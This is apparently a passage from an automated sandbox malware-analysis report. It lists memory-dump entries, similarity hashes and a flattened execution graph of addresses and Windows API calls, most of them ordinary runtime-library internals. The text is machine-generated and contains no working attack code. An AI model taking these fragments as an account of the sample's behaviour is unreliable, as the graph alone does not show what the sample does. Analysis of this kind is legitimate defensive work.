                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                              • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                              • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:11.6%
                                                                                              Dynamic/Decrypted Code Coverage:5.6%
                                                                                              Signature Coverage:1.7%
                                                                                              Total number of Nodes:1830
                                                                                              Total number of Limit Nodes:46
                                                                                              execution_graph 8970 40124c 8975 4018b6 SetUnhandledExceptionFilter 8970->8975 8972 401251 8976 405c2f 8972->8976 8974 40125c 8975->8972 8977 405c55 8976->8977 8978 405c3b 8976->8978 8977->8974 8978->8977 8983 407b2a 8978->8983 8989 406d81 GetLastError 8983->8989 8985 405c45 8986 406527 8985->8986 9210 406473 8986->9210 8990 406d97 8989->8990 8993 406d9d 8989->8993 9012 40ae5e 8990->9012 9009 406da1 SetLastError 8993->9009 9017 40ae9d 8993->9017 8998 406dd6 9000 40ae9d _unexpected 6 API calls 8998->9000 8999 406de7 9001 40ae9d _unexpected 6 API calls 8999->9001 9003 406de4 9000->9003 9002 406df3 9001->9002 9004 406df7 9002->9004 9005 406e0e 9002->9005 9029 408654 9003->9029 9006 40ae9d _unexpected 6 API calls 9004->9006 9035 406a5e 9005->9035 9006->9003 9009->8985 9011 408654 ___free_lconv_mon 12 API calls 9011->9009 9040 40ac9f 9012->9040 9014 40ae7a 9015 40ae83 9014->9015 9016 40ae95 TlsGetValue 9014->9016 9015->8993 9018 40ac9f _unexpected 5 API calls 9017->9018 9019 40aeb9 9018->9019 9020 406db9 9019->9020 9021 40aed7 TlsSetValue 9019->9021 9020->9009 9022 4085f7 9020->9022 9027 408604 _unexpected 9022->9027 9023 408644 9026 407b2a __dosmaperr 13 API calls 9023->9026 9024 40862f RtlAllocateHeap 9025 406dce 9024->9025 9024->9027 9025->8998 9025->8999 9026->9025 9027->9023 9027->9024 9054 40b132 9027->9054 9030 40865f HeapFree 9029->9030 9034 408689 9029->9034 9031 408674 GetLastError 9030->9031 9030->9034 9032 408681 __dosmaperr 9031->9032 9033 407b2a __dosmaperr 12 API calls 9032->9033 9033->9034 9034->9009 9068 4068f2 9035->9068 9041 40accf 9040->9041 9045 40accb _unexpected 9040->9045 9041->9045 9046 40abd4 9041->9046 9044 40ace9 GetProcAddress 9044->9045 9045->9014 9052 40abe5 ___vcrt_InitializeCriticalSectionEx 9046->9052 9047 40ac7b 9047->9044 9047->9045 9048 40ac03 LoadLibraryExW 9049 40ac82 9048->9049 9050 40ac1e GetLastError 9048->9050 9049->9047 9051 40ac94 FreeLibrary 9049->9051 9050->9052 9051->9047 9052->9047 9052->9048 9053 40ac51 LoadLibraryExW 9052->9053 9053->9049 9053->9052 9057 40b15e 9054->9057 9058 40b16a ___scrt_is_nonwritable_in_current_image 9057->9058 9063 409efe EnterCriticalSection 9058->9063 9060 40b175 CallUnexpected 9064 40b1ac 9060->9064 9063->9060 9067 409f46 LeaveCriticalSection 9064->9067 9066 40b13d 9066->9027 9067->9066 9069 4068fe ___scrt_is_nonwritable_in_current_image 9068->9069 9082 409efe EnterCriticalSection 9069->9082 9071 406908 9083 406938 9071->9083 9074 406a04 9075 406a10 ___scrt_is_nonwritable_in_current_image 9074->9075 9087 409efe EnterCriticalSection 9075->9087 9077 406a1a 9088 406be5 9077->9088 9079 406a32 9092 406a52 9079->9092 9082->9071 9086 409f46 LeaveCriticalSection 9083->9086 9085 406926 9085->9074 9086->9085 9087->9077 9089 406c1b _unexpected 9088->9089 9090 406bf4 _unexpected 9088->9090 9089->9079 9090->9089 9095 40a84f 9090->9095 9209 409f46 LeaveCriticalSection 9092->9209 9094 406a40 9094->9011 9096 40a8cf 9095->9096 9099 40a865 9095->9099 9098 408654 ___free_lconv_mon 14 API calls 9096->9098 9121 40a91d 9096->9121 9100 40a8f1 9098->9100 9099->9096 9103 408654 ___free_lconv_mon 14 API calls 9099->9103 9105 40a898 9099->9105 9101 408654 ___free_lconv_mon 14 API calls 9100->9101 9104 40a904 9101->9104 9102 40a92b 9107 40a98b 9102->9107 9113 408654 14 API calls ___free_lconv_mon 9102->9113 9108 40a88d 9103->9108 9109 408654 ___free_lconv_mon 14 API calls 9104->9109 9110 408654 ___free_lconv_mon 14 API calls 9105->9110 9122 40a8ba 9105->9122 9106 408654 ___free_lconv_mon 14 API calls 9111 40a8c4 9106->9111 9112 408654 ___free_lconv_mon 14 API calls 9107->9112 9123 40a3f3 9108->9123 9115 40a912 9109->9115 9116 40a8af 9110->9116 9117 408654 ___free_lconv_mon 14 API calls 9111->9117 9118 40a991 9112->9118 9113->9102 9119 408654 ___free_lconv_mon 14 API calls 9115->9119 9151 40a4f1 9116->9151 9117->9096 9118->9089 9119->9121 9163 40a9c0 9121->9163 9122->9106 9124 40a404 9123->9124 9150 40a4ed 9123->9150 9125 408654 ___free_lconv_mon 14 API calls 9124->9125 9126 40a415 9124->9126 9125->9126 9127 40a427 9126->9127 9128 408654 ___free_lconv_mon 14 API calls 9126->9128 9129 40a439 9127->9129 9130 408654 ___free_lconv_mon 14 API calls 9127->9130 9128->9127 9131 40a44b 9129->9131 9132 408654 ___free_lconv_mon 14 API calls 9129->9132 9130->9129 9133 40a45d 9131->9133 9134 408654 ___free_lconv_mon 14 API calls 9131->9134 9132->9131 9135 40a46f 9133->9135 9136 408654 ___free_lconv_mon 14 API calls 9133->9136 9134->9133 9137 40a481 9135->9137 9138 408654 ___free_lconv_mon 14 API calls 9135->9138 9136->9135 9139 40a493 9137->9139 9140 408654 ___free_lconv_mon 14 API calls 9137->9140 9138->9137 9141 40a4a5 9139->9141 9142 408654 ___free_lconv_mon 14 API calls 9139->9142 9140->9139 9143 40a4b7 9141->9143 9144 408654 ___free_lconv_mon 14 API calls 9141->9144 9142->9141 9145 40a4c9 9143->9145 9146 408654 ___free_lconv_mon 14 API calls 9143->9146 9144->9143 9147 40a4db 9145->9147 9148 408654 ___free_lconv_mon 14 API calls 9145->9148 9146->9145 9149 408654 ___free_lconv_mon 14 API calls 9147->9149 9147->9150 9148->9147 9149->9150 9150->9105 9152 40a4fe 9151->9152 9162 40a556 9151->9162 9153 40a50e 9152->9153 9154 408654 ___free_lconv_mon 14 API calls 9152->9154 9155 40a520 9153->9155 9156 408654 ___free_lconv_mon 14 API calls 9153->9156 9154->9153 9157 408654 ___free_lconv_mon 14 API calls 9155->9157 9158 40a532 9155->9158 9156->9155 9157->9158 9159 40a544 9158->9159 9160 408654 ___free_lconv_mon 14 API calls 9158->9160 9161 408654 ___free_lconv_mon 14 API calls 9159->9161 9159->9162 9160->9159 9161->9162 9162->9122 9164 40a9cd 9163->9164 9165 40a9ec 9163->9165 9164->9165 9169 40a57f 9164->9169 9165->9102 9168 408654 ___free_lconv_mon 14 API calls 9168->9165 9170 40a65d 9169->9170 9171 40a590 9169->9171 9170->9168 9205 40a55a 9171->9205 9174 40a55a _unexpected 14 API calls 9175 40a5a3 9174->9175 9176 40a55a _unexpected 14 API calls 9175->9176 9177 40a5ae 9176->9177 9178 40a55a _unexpected 14 API calls 9177->9178 9179 40a5b9 9178->9179 9180 40a55a _unexpected 14 API calls 9179->9180 9181 40a5c7 9180->9181 9182 408654 ___free_lconv_mon 14 API calls 9181->9182 9183 40a5d2 9182->9183 9184 408654 ___free_lconv_mon 14 API calls 9183->9184 9185 40a5dd 9184->9185 9186 408654 ___free_lconv_mon 14 API calls 9185->9186 9187 40a5e8 9186->9187 9188 40a55a _unexpected 14 API calls 9187->9188 9189 40a5f6 9188->9189 9190 40a55a _unexpected 14 API calls 9189->9190 9191 40a604 9190->9191 9192 40a55a _unexpected 14 API calls 9191->9192 9193 40a615 9192->9193 9194 40a55a _unexpected 14 API calls 9193->9194 9195 40a623 9194->9195 9196 40a55a _unexpected 14 API calls 9195->9196 9197 40a631 9196->9197 9198 408654 ___free_lconv_mon 14 API calls 9197->9198 9199 40a63c 9198->9199 9200 408654 ___free_lconv_mon 14 API calls 9199->9200 9201 40a647 9200->9201 9202 408654 ___free_lconv_mon 14 API calls 9201->9202 9203 40a652 9202->9203 9204 408654 ___free_lconv_mon 14 API calls 9203->9204 9204->9170 9206 40a56c 9205->9206 9207 40a57b 9206->9207 9208 408654 ___free_lconv_mon 14 API calls 9206->9208 9207->9174 9208->9206 9209->9094 9211 406485 __wsopen_s 9210->9211 9216 4064aa 9211->9216 9213 40649d 9227 40427b 9213->9227 9217 4064c1 9216->9217 9218 4064ba 9216->9218 9224 4064cf 9217->9224 9237 406302 9217->9237 9233 40467e GetLastError 9218->9233 9221 4064f6 9221->9224 9240 406537 IsProcessorFeaturePresent 9221->9240 9223 406526 9225 406473 __wsopen_s 39 API calls 9223->9225 9224->9213 9226 406533 9225->9226 9226->9213 9228 404287 9227->9228 9231 40429e 9228->9231 9280 4046c4 9228->9280 9230 4046c4 __wsopen_s 39 API calls 9232 4042b1 9230->9232 9231->9230 9231->9232 9232->8974 9234 404697 9233->9234 9244 406e32 9234->9244 9238 406326 9237->9238 9239 40630d GetLastError SetLastError 9237->9239 9238->9221 9239->9221 9241 406543 9240->9241 9266 40632b 9241->9266 9245 406e45 9244->9245 9246 406e4b 9244->9246 9247 40ae5e _unexpected 6 API calls 9245->9247 9248 40ae9d _unexpected 6 API calls 9246->9248 9250 4046af SetLastError 9246->9250 9247->9246 9249 406e65 9248->9249 9249->9250 9251 4085f7 _unexpected 14 API calls 9249->9251 9250->9217 9252 406e75 9251->9252 9253 406e92 9252->9253 9254 406e7d 9252->9254 9255 40ae9d _unexpected 6 API calls 9253->9255 9256 40ae9d _unexpected 6 API calls 9254->9256 9258 406e9e 9255->9258 9257 406e89 9256->9257 9261 408654 ___free_lconv_mon 14 API calls 9257->9261 9259 406eb1 9258->9259 9260 406ea2 9258->9260 9263 406a5e _unexpected 14 API calls 9259->9263 9262 40ae9d _unexpected 6 API calls 9260->9262 9261->9250 9262->9257 9264 406ebc 9263->9264 9265 408654 ___free_lconv_mon 14 API calls 9264->9265 9265->9250 9267 406347 __fread_nolock CallUnexpected 9266->9267 9268 406373 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9267->9268 9271 406444 CallUnexpected 9268->9271 9270 406462 GetCurrentProcess TerminateProcess 9270->9223 9272 401ba5 9271->9272 9273 401bad 9272->9273 9274 401bae IsProcessorFeaturePresent 9272->9274 9273->9270 9276 401bf0 9274->9276 9279 401bb3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9276->9279 9278 401cd3 9278->9270 9279->9278 9281 4046d7 9280->9281 9282 4046ce 9280->9282 9281->9231 9283 40467e __wsopen_s 16 API calls 9282->9283 9284 4046d3 9283->9284 9284->9281 9287 4061fe 9284->9287 9298 40b287 9287->9298 9290 40620e 9292 406218 IsProcessorFeaturePresent 9290->9292 9293 406237 9290->9293 9294 406224 9292->9294 9328 405976 9293->9328 9296 40632b CallUnexpected 8 API calls 9294->9296 9296->9293 9331 40b1b5 9298->9331 9301 40b2cc 9302 40b2d8 ___scrt_is_nonwritable_in_current_image 9301->9302 9303 406d81 __dosmaperr 14 API calls 9302->9303 9304 40b328 9302->9304 9305 40b33a CallUnexpected 9302->9305 9310 40b309 CallUnexpected 9302->9310 9303->9310 9306 407b2a __dosmaperr 14 API calls 9304->9306 9307 40b370 CallUnexpected 9305->9307 9342 409efe EnterCriticalSection 9305->9342 9308 40b32d 9306->9308 9313 40b4aa 9307->9313 9314 40b3ad 9307->9314 9324 40b3db 9307->9324 9311 406527 __wsopen_s 39 API calls 9308->9311 9310->9304 9310->9305 9327 40b312 9310->9327 9311->9327 9315 40b4b5 9313->9315 9374 409f46 LeaveCriticalSection 9313->9374 9314->9324 9343 406c30 GetLastError 9314->9343 9318 405976 CallUnexpected 21 API calls 9315->9318 9320 40b4bd 9318->9320 9321 406c30 _unexpected 39 API calls 9325 40b430 9321->9325 9323 406c30 _unexpected 39 API calls 9323->9324 9370 40b456 9324->9370 9326 406c30 _unexpected 39 API calls 9325->9326 9325->9327 9326->9327 9327->9290 9376 4057e6 9328->9376 9332 40b1c1 ___scrt_is_nonwritable_in_current_image 9331->9332 9337 409efe EnterCriticalSection 9332->9337 9334 40b1cf 9338 40b211 9334->9338 9337->9334 9341 409f46 LeaveCriticalSection 9338->9341 9340 406203 9340->9290 9340->9301 9341->9340 9342->9307 9344 406c4c 9343->9344 9345 406c46 9343->9345 9346 40ae9d _unexpected 6 API calls 9344->9346 9349 406c50 SetLastError 9344->9349 9347 40ae5e _unexpected 6 API calls 9345->9347 9348 406c68 9346->9348 9347->9344 9348->9349 9351 4085f7 _unexpected 14 API calls 9348->9351 9353 406ce0 9349->9353 9354 406ce5 9349->9354 9352 406c7d 9351->9352 9355 406c85 9352->9355 9356 406c96 9352->9356 9353->9323 9357 4061fe CallUnexpected 37 API calls 9354->9357 9358 40ae9d _unexpected 6 API calls 9355->9358 9359 40ae9d _unexpected 6 API calls 9356->9359 9360 406cea 9357->9360 9361 406c93 9358->9361 9362 406ca2 9359->9362 9365 408654 ___free_lconv_mon 14 API calls 9361->9365 9363 406ca6 9362->9363 9364 406cbd 9362->9364 9367 40ae9d _unexpected 6 API calls 9363->9367 9366 406a5e _unexpected 14 API calls 9364->9366 9365->9349 9368 406cc8 9366->9368 9367->9361 9369 408654 ___free_lconv_mon 14 API calls 9368->9369 9369->9349 9371 40b422 9370->9371 9372 40b45a 9370->9372 9371->9321 9371->9325 9371->9327 9375 409f46 LeaveCriticalSection 9372->9375 9374->9315 9375->9371 9377 405813 9376->9377 9385 405824 9376->9385 9387 401874 GetModuleHandleW 9377->9387 9382 405862 9394 405696 9385->9394 9388 401880 9387->9388 9388->9385 9389 4058c7 GetModuleHandleExW 9388->9389 9390 405906 GetProcAddress 9389->9390 9391 40591a 9389->9391 9390->9391 9392 405936 9391->9392 9393 40592d FreeLibrary 9391->9393 9392->9385 9393->9392 9395 4056a2 ___scrt_is_nonwritable_in_current_image 9394->9395 9409 409efe EnterCriticalSection 9395->9409 9397 4056ac 9410 4056fe 9397->9410 9399 4056b9 9414 4056d7 9399->9414 9402 40587d 9417 4058ae 9402->9417 9404 405887 9405 40589b 9404->9405 9406 40588b GetCurrentProcess TerminateProcess 9404->9406 9407 4058c7 CallUnexpected 3 API calls 9405->9407 9406->9405 9408 4058a3 ExitProcess 9407->9408 9409->9397 9411 40570a ___scrt_is_nonwritable_in_current_image CallUnexpected 9410->9411 9412 405f0c CallUnexpected 14 API calls 9411->9412 9413 40576e CallUnexpected 9411->9413 9412->9413 9413->9399 9415 409f46 CallUnexpected LeaveCriticalSection 9414->9415 9416 4056c5 9415->9416 9416->9382 9416->9402 9418 409f82 CallUnexpected 5 API calls 9417->9418 9419 4058b3 CallUnexpected 9418->9419 9419->9404 9633 407ecd 9638 407ca3 9633->9638 9636 407f0c 9639 407cc2 9638->9639 9640 407cd5 9639->9640 9648 407cea 9639->9648 9641 407b2a __dosmaperr 14 API calls 9640->9641 9642 407cda 9641->9642 9643 406527 __wsopen_s 39 API calls 9642->9643 9644 407ce5 9643->9644 9644->9636 9655 40c357 9644->9655 9645 407b2a __dosmaperr 14 API calls 9646 407ebb 9645->9646 9647 406527 __wsopen_s 39 API calls 9646->9647 9647->9644 9653 407e0a 9648->9653 9658 40bbc7 9648->9658 9650 407e5a 9651 40bbc7 39 API calls 9650->9651 9650->9653 9652 407e78 9651->9652 9652->9653 9654 40bbc7 39 API calls 9652->9654 9653->9644 9653->9645 9654->9653 9749 40bcff 9655->9749 9659 40bbd6 9658->9659 9660 40bc1e 9658->9660 9661 40bbdc 9659->9661 9664 40bbf9 9659->9664 9672 40bc34 9660->9672 9663 407b2a __dosmaperr 14 API calls 9661->9663 9665 40bbe1 9663->9665 9667 407b2a __dosmaperr 14 API calls 9664->9667 9671 40bc17 9664->9671 9666 406527 __wsopen_s 39 API calls 9665->9666 9668 40bbec 9666->9668 9669 40bc08 9667->9669 9668->9650 9670 406527 __wsopen_s 39 API calls 9669->9670 9670->9668 9671->9650 9673 40bc44 9672->9673 9674 40bc5e 9672->9674 9677 407b2a __dosmaperr 14 API calls 9673->9677 9675 40bc66 9674->9675 9676 40bc7d 9674->9676 9678 407b2a __dosmaperr 14 API calls 9675->9678 9679 40bca0 9676->9679 9680 40bc89 9676->9680 9681 40bc49 9677->9681 9682 40bc6b 9678->9682 9689 40bc54 9679->9689 9690 40806f 9679->9690 9683 407b2a __dosmaperr 14 API calls 9680->9683 9684 406527 __wsopen_s 39 API calls 9681->9684 9685 406527 __wsopen_s 39 API calls 9682->9685 9686 40bc8e 9683->9686 9684->9689 9685->9689 9688 406527 __wsopen_s 39 API calls 9686->9688 9688->9689 9689->9668 9691 40808d 9690->9691 9692 408086 9690->9692 9691->9692 9693 406c30 _unexpected 39 API calls 9691->9693 9692->9689 9694 4080ae 9693->9694 9698 4080f1 9694->9698 9699 408104 9698->9699 9701 4080c4 9698->9701 9699->9701 9706 40aa9b 9699->9706 9702 40814f 9701->9702 9703 408162 9702->9703 9704 408177 9702->9704 9703->9704 9728 40961e 9703->9728 9704->9692 9707 40aaa7 ___scrt_is_nonwritable_in_current_image 9706->9707 9708 406c30 _unexpected 39 API calls 9707->9708 9709 40aab0 9708->9709 9716 40aaf6 9709->9716 9719 409efe EnterCriticalSection 9709->9719 9711 40aace 9720 40ab1c 9711->9720 9716->9701 9717 4061fe CallUnexpected 39 API calls 9718 40ab1b 9717->9718 9719->9711 9721 40ab2a _unexpected 9720->9721 9723 40aadf 9720->9723 9722 40a84f _unexpected 14 API calls 9721->9722 9721->9723 9722->9723 9724 40aafb 9723->9724 9727 409f46 LeaveCriticalSection 9724->9727 9726 40aaf2 9726->9716 9726->9717 9727->9726 9729 406c30 _unexpected 39 API calls 9728->9729 9730 409623 9729->9730 9733 409536 9730->9733 9734 409542 ___scrt_is_nonwritable_in_current_image 9733->9734 9740 40955c 9734->9740 9744 409efe EnterCriticalSection 9734->9744 9736 40956c 9742 408654 ___free_lconv_mon 14 API calls 9736->9742 9743 409598 9736->9743 9737 409563 9737->9704 9739 4061fe CallUnexpected 39 API calls 9741 4095d5 9739->9741 9740->9737 9740->9739 9742->9743 9745 4095b5 9743->9745 9744->9736 9748 409f46 LeaveCriticalSection 9745->9748 9747 4095bc 9747->9740 9748->9747 9751 40bd0b ___scrt_is_nonwritable_in_current_image 9749->9751 9750 40bd12 9752 407b2a __dosmaperr 14 API calls 9750->9752 9751->9750 9754 40bd3d 9751->9754 9753 40bd17 9752->9753 9755 406527 __wsopen_s 39 API calls 9753->9755 9760 40c2e9 9754->9760 9759 40bd21 9755->9759 9759->9636 9773 408d37 9760->9773 9765 40c31f 9767 40bd61 9765->9767 9768 408654 ___free_lconv_mon 14 API calls 9765->9768 9769 40bd94 9767->9769 9768->9767 9770 40bd9a 9769->9770 9772 40bdd8 9769->9772 10148 40a1ac LeaveCriticalSection 9770->10148 9772->9759 9774 40806f __wsopen_s 39 API calls 9773->9774 9775 408d49 9774->9775 9777 408d5b 9775->9777 9828 40ad64 9775->9828 9778 40881e 9777->9778 9834 4086a6 9778->9834 9781 40c377 9864 40c0c5 9781->9864 9784 40c3c2 9882 40a1cf 9784->9882 9785 40c3a9 9786 407b17 __dosmaperr 14 API calls 9785->9786 9788 40c3ae 9786->9788 9793 407b2a __dosmaperr 14 API calls 9788->9793 9790 40c3d0 9794 407b17 __dosmaperr 14 API calls 9790->9794 9791 40c3e7 9895 40c030 CreateFileW 9791->9895 9819 40c3bb 9793->9819 9795 40c3d5 9794->9795 9796 407b2a __dosmaperr 14 API calls 9795->9796 9796->9788 9797 40c49d GetFileType 9799 40c4a8 GetLastError 9797->9799 9800 40c4ef 9797->9800 9798 40c472 GetLastError 9803 407ad0 __dosmaperr 14 API calls 9798->9803 9801 407ad0 __dosmaperr 14 API calls 9799->9801 9897 40a11a 9800->9897 9804 40c4b6 CloseHandle 9801->9804 9802 40c420 9802->9797 9802->9798 9896 40c030 CreateFileW 9802->9896 9803->9788 9804->9788 9806 40c4df 9804->9806 9809 407b2a __dosmaperr 14 API calls 9806->9809 9808 40c465 9808->9797 9808->9798 9811 40c4e4 9809->9811 9811->9788 9815 40c55c 9816 40c563 9815->9816 9927 40bdda 9815->9927 9921 40e660 9816->9921 9817 40c59f 9817->9819 9820 40c61b CloseHandle 9817->9820 9819->9765 9954 40c030 CreateFileW 9820->9954 9822 40c646 9823 40c650 GetLastError 9822->9823 9824 40c67c 9822->9824 9825 407ad0 __dosmaperr 14 API calls 9823->9825 9824->9819 9826 40c65c 9825->9826 9955 40a2e2 9826->9955 9831 40ab6c 9828->9831 9832 40ac9f _unexpected 5 API calls 9831->9832 9833 40ab82 9832->9833 9833->9777 9835 4086b4 9834->9835 9836 4086ce 9834->9836 9852 408d76 9835->9852 9837 4086f4 9836->9837 9838 4086d5 9836->9838 9840 409936 __wsopen_s MultiByteToWideChar 9837->9840 9841 4086be 9838->9841 9856 408dcc 9838->9856 9843 408703 9840->9843 9841->9765 9841->9781 9844 40870a GetLastError 9843->9844 9846 408dcc __wsopen_s 15 API calls 9843->9846 9849 408730 9843->9849 9845 407ad0 __dosmaperr 14 API calls 9844->9845 9848 408716 9845->9848 9846->9849 9847 409936 __wsopen_s MultiByteToWideChar 9850 408747 9847->9850 9851 407b2a __dosmaperr 14 API calls 9848->9851 9849->9841 9849->9847 9850->9841 9850->9844 9851->9841 9853 408d81 9852->9853 9854 408d89 9852->9854 9855 408654 ___free_lconv_mon 14 API calls 9853->9855 9854->9841 9855->9854 9857 408d76 __wsopen_s 14 API calls 9856->9857 9858 408dda 9857->9858 9861 408e0b 9858->9861 9862 40a663 __fread_nolock 15 API calls 9861->9862 9863 408deb 9862->9863 9863->9841 9865 40c0e6 9864->9865 9866 40c100 9864->9866 9865->9866 9868 407b2a __dosmaperr 14 API calls 9865->9868 9964 40c055 9866->9964 9869 40c0f5 9868->9869 9870 406527 __wsopen_s 39 API calls 9869->9870 9870->9866 9871 40c138 9872 40c167 9871->9872 9874 407b2a __dosmaperr 14 API calls 9871->9874 9875 40c1ba 9872->9875 9971 4059c8 9872->9971 9877 40c15c 9874->9877 9875->9784 9875->9785 9876 40c1b5 9876->9875 9878 40c232 9876->9878 9879 406527 __wsopen_s 39 API calls 9877->9879 9880 406537 __wsopen_s 11 API calls 9878->9880 9879->9872 9881 40c23e 9880->9881 9883 40a1db ___scrt_is_nonwritable_in_current_image 9882->9883 9978 409efe EnterCriticalSection 9883->9978 9885 40a229 9979 40a2d9 9885->9979 9886 40a207 9982 409fa9 9886->9982 9887 40a1e2 9887->9885 9887->9886 9892 40a276 EnterCriticalSection 9887->9892 9892->9885 9893 40a283 LeaveCriticalSection 9892->9893 9893->9887 9895->9802 9896->9808 9898 40a192 9897->9898 9899 40a129 9897->9899 9900 407b2a __dosmaperr 14 API calls 9898->9900 9899->9898 9905 40a14f __wsopen_s 9899->9905 9901 40a197 9900->9901 9902 407b17 __dosmaperr 14 API calls 9901->9902 9903 40a17f 9902->9903 9903->9815 9906 40c23f 9903->9906 9904 40a179 SetStdHandle 9904->9903 9905->9903 9905->9904 9907 40c267 9906->9907 9919 40c299 9906->9919 9908 406894 __fread_nolock 41 API calls 9907->9908 9907->9919 9909 40c277 9908->9909 9910 40c287 9909->9910 9911 40c29d 9909->9911 9912 407b17 __dosmaperr 14 API calls 9910->9912 9913 407510 __fread_nolock 51 API calls 9911->9913 9918 40c28c 9912->9918 9914 40c2af 9913->9914 9920 40c2c5 9914->9920 9996 40e35e 9914->9996 9915 406894 __fread_nolock 41 API calls 9915->9918 9916 407b2a __dosmaperr 14 API calls 9916->9919 9918->9916 9918->9919 9919->9815 9920->9915 9920->9918 9922 40e673 __wsopen_s 9921->9922 10113 40e690 9922->10113 9924 40e67f 9925 40427b __wsopen_s 39 API calls 9924->9925 9926 40e68b 9925->9926 9926->9819 9928 40be0b 9927->9928 9950 40bef5 9927->9950 9929 4059c8 __wsopen_s 39 API calls 9928->9929 9932 40be2b 9928->9932 9930 40be22 9929->9930 9931 40c025 9930->9931 9930->9932 9933 406537 __wsopen_s 11 API calls 9931->9933 9936 406894 __fread_nolock 41 API calls 9932->9936 9937 40beec 9932->9937 9932->9950 9952 40bf1b 9932->9952 9934 40c02f 9933->9934 9935 407510 __fread_nolock 51 API calls 9942 40bf4b 9935->9942 9939 40bf05 9936->9939 9938 40bf25 9937->9938 9937->9950 10126 40cf62 9937->10126 9946 407b2a __dosmaperr 14 API calls 9938->9946 9938->9950 9939->9937 9945 40bf10 9939->9945 9941 40bfb6 9951 406894 __fread_nolock 41 API calls 9941->9951 9942->9938 9942->9941 9943 40bf90 9942->9943 9944 40bf83 9942->9944 9942->9950 9943->9941 9949 40bf98 9943->9949 9947 407b2a __dosmaperr 14 API calls 9944->9947 9948 406894 __fread_nolock 41 API calls 9945->9948 9946->9950 9947->9938 9948->9952 9953 406894 __fread_nolock 41 API calls 9949->9953 9950->9816 9950->9817 9951->9938 9952->9935 9952->9938 9952->9950 9953->9938 9954->9822 9956 40a2f1 9955->9956 9957 40a358 9955->9957 9956->9957 9963 40a31b __wsopen_s 9956->9963 9958 407b2a __dosmaperr 14 API calls 9957->9958 9959 40a35d 9958->9959 9960 407b17 __dosmaperr 14 API calls 9959->9960 9961 40a348 9960->9961 9961->9824 9962 40a342 SetStdHandle 9962->9961 9963->9961 9963->9962 9965 40c06d 9964->9965 9966 40c088 9965->9966 9967 407b2a __dosmaperr 14 API calls 9965->9967 9966->9871 9968 40c0ac 9967->9968 9969 406527 __wsopen_s 39 API calls 9968->9969 9970 40c0b7 9969->9970 9970->9871 9972 4059d4 9971->9972 9973 4059e9 9971->9973 9974 407b2a __dosmaperr 14 API calls 9972->9974 9973->9876 9975 4059d9 9974->9975 9976 406527 __wsopen_s 39 API calls 9975->9976 9977 4059e4 9976->9977 9977->9876 9978->9887 9990 409f46 LeaveCriticalSection 9979->9990 9981 40a249 9981->9790 9981->9791 9983 4085f7 _unexpected 14 API calls 9982->9983 9984 409fbb 9983->9984 9988 409fc8 9984->9988 9991 40aedf 9984->9991 9985 408654 ___free_lconv_mon 14 API calls 9987 40a01d 9985->9987 9987->9885 9989 40a0f7 EnterCriticalSection 9987->9989 9988->9985 9989->9885 9990->9981 9992 40ac9f _unexpected 5 API calls 9991->9992 9993 40aefb 9992->9993 9994 40af19 InitializeCriticalSectionAndSpinCount 9993->9994 9995 40af04 9993->9995 9994->9995 9995->9984 9997 40e371 __wsopen_s 9996->9997 10002 40e395 9997->10002 10000 40427b __wsopen_s 39 API calls 10001 40e390 10000->10001 10001->9920 10022 40e311 10002->10022 10005 40e4af 10008 406894 __fread_nolock 41 API calls 10005->10008 10016 40e478 10005->10016 10006 40e3f1 10009 4085f7 _unexpected 14 API calls 10006->10009 10007 406894 __fread_nolock 41 API calls 10010 40e383 10007->10010 10011 40e4c7 10008->10011 10018 40e3fd __wsopen_s 10009->10018 10010->10000 10012 40a373 __fread_nolock 39 API calls 10011->10012 10011->10016 10013 40e4df SetEndOfFile 10012->10013 10014 40e4eb GetLastError 10013->10014 10013->10016 10014->10016 10015 408654 ___free_lconv_mon 14 API calls 10015->10016 10016->10007 10019 40e405 10018->10019 10020 40e469 __wsopen_s 10018->10020 10027 40d0aa 10018->10027 10019->10015 10021 408654 ___free_lconv_mon 14 API calls 10020->10021 10021->10016 10023 406894 __fread_nolock 41 API calls 10022->10023 10024 40e32a 10023->10024 10025 406894 __fread_nolock 41 API calls 10024->10025 10026 40e339 10025->10026 10026->10005 10026->10006 10026->10016 10028 40d0d2 10027->10028 10051 40d0f5 __fread_nolock 10027->10051 10029 40d0d6 10028->10029 10031 40d131 10028->10031 10030 4064aa __wsopen_s 39 API calls 10029->10030 10030->10051 10032 40d14f 10031->10032 10053 4068d4 10031->10053 10056 40cbef 10032->10056 10036 40d167 10040 40d196 10036->10040 10041 40d16f 10036->10041 10037 40d1ae 10038 40d1c2 10037->10038 10039 40d217 WriteFile 10037->10039 10044 40d203 10038->10044 10045 40d1ca 10038->10045 10042 40d239 GetLastError 10039->10042 10039->10051 10068 40c7c0 GetConsoleOutputCP 10040->10068 10041->10051 10063 40cb87 10041->10063 10042->10051 10096 40cc6c 10044->10096 10048 40d1ef 10045->10048 10049 40d1cf 10045->10049 10088 40ce30 10048->10088 10049->10051 10081 40cd47 10049->10081 10051->10018 10054 4067f3 __fread_nolock 41 API calls 10053->10054 10055 4068ed 10054->10055 10055->10032 10057 40bb22 __fread_nolock 39 API calls 10056->10057 10058 40cc01 10057->10058 10059 40cc65 